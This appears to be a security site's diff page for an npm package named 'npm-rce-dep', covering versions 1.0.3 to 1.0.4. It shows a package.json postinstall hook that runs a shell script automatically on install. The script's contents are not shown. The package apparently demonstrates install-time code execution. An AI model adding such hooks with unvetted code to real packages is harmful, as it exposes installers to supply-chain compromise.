@programmeramera/npm-rce-dep 1.0.3 → 1.0.4
Sign up to get free protection for your applications and to get access to all the features.
- package/output.txt +5 -0
- package/package.json +3 -2
- package/postinstall.sh +1 -1
package/output.txt
ADDED
package/package.json
CHANGED
@@ -1,12 +1,13 @@
|
|
1
1
|
{
|
2
2
|
"name": "@programmeramera/npm-rce-dep",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.4",
|
4
4
|
"description": "",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"build": "npx tsc",
|
8
|
-
"postinstall": "sh postinstall.sh"
|
8
|
+
"postinstall": "sh ./postinstall.sh"
|
9
9
|
},
|
10
|
+
|
10
11
|
"keywords": [],
|
11
12
|
"author": "Johan Lindfors // programmeramera",
|
12
13
|
"license": "ISC",
|
package/postinstall.sh
CHANGED